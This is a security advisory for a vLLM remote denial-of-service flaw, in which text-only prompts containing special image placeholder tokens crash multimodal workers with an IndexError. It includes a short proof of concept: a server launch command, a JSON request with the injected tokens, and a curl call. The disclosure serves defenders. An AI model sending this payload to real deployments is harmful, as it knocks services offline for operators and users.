vLLM Vulnerable to Remote DoS via Special-Token Placeholders

GHSA-hpv8-x276-m59f · CVE-2026-44222

Published May 5, 2026 · Modified Jun 1, 2026

Description

Summary

This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

Details

Affected component: multimodal input position computation.
File/functions (paths are indicative):
- vllm/model_executor/layers/rotary_embedding.py
  - get_input_positions_tensor(...)
  - _vl_get_input_positions_tensor(...)
Failure mechanism:
- The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
- When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.

Representative snippet (context):

# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )

Abbreviated call path:

OpenAI API request
 → vllm.v1.engine.core: step/execute_model
 → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
 → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
 → _vl_get_input_positions_tensor
 → IndexError: list index out of range

PoC

Environment

vLLM: 0.10.0
Model: Qwen/Qwen2.5-VL-3B-Instruct
Launch server:

python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000

Request (text-only, no image/video data)

cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        { "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json

Observed result

HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
In some deployments, the worker exits and capacity remains reduced until manual restart.

Impact

Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
Effect: Request → unhandled exception in position computation → worker termination / service unavailability.

Fixes

Changes associated with https://github.com/vllm-project/vllm/issues/32656

Credits

Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes